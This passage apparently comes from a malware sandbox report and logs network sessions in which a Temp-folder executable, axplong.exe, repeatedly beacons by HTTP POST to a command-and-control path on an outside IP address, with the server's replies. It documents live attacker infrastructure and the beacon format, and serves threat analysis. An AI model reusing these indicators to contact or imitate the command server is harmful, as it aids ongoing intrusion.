Jul 26, 2024 20:59:31.999113083 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	51106	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:32.115940094 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:32.897625923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:32.898487091 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:33.151348114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	51107	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:33.273516893 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:34.030066967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:34.030886889 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:34.277672052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	51108	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:34.398389101 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:35.176794052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:35.177727938 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:35.434612989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	51109	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:35.553489923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:36.307928085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:36.309175014 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:36.753010988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	51110	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:36.872548103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:37.621932030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:37.622709990 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:37.870968103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	51111	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:37.992974997 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:38.749280930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:38.752742052 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:39.001477957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	51112	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:39.116029024 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:39.881031036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:39.881711960 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:40.131341934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	51113	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:40.246699095 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:40.995807886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:40.996995926 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:41.244425058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	51114	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:41.366251945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:42.137684107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:42.153704882 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:42.405893087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	51115	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:42.522808075 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:43.295447111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:43.296531916 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:43.552113056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	51116	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:43.663384914 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:44.459116936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:44.460222960 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:44.713229895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	51117	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:44.834817886 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:45.619643927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:45.620762110 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:46.079377890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 20:59:46.081624985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	51118	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:46.198771000 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
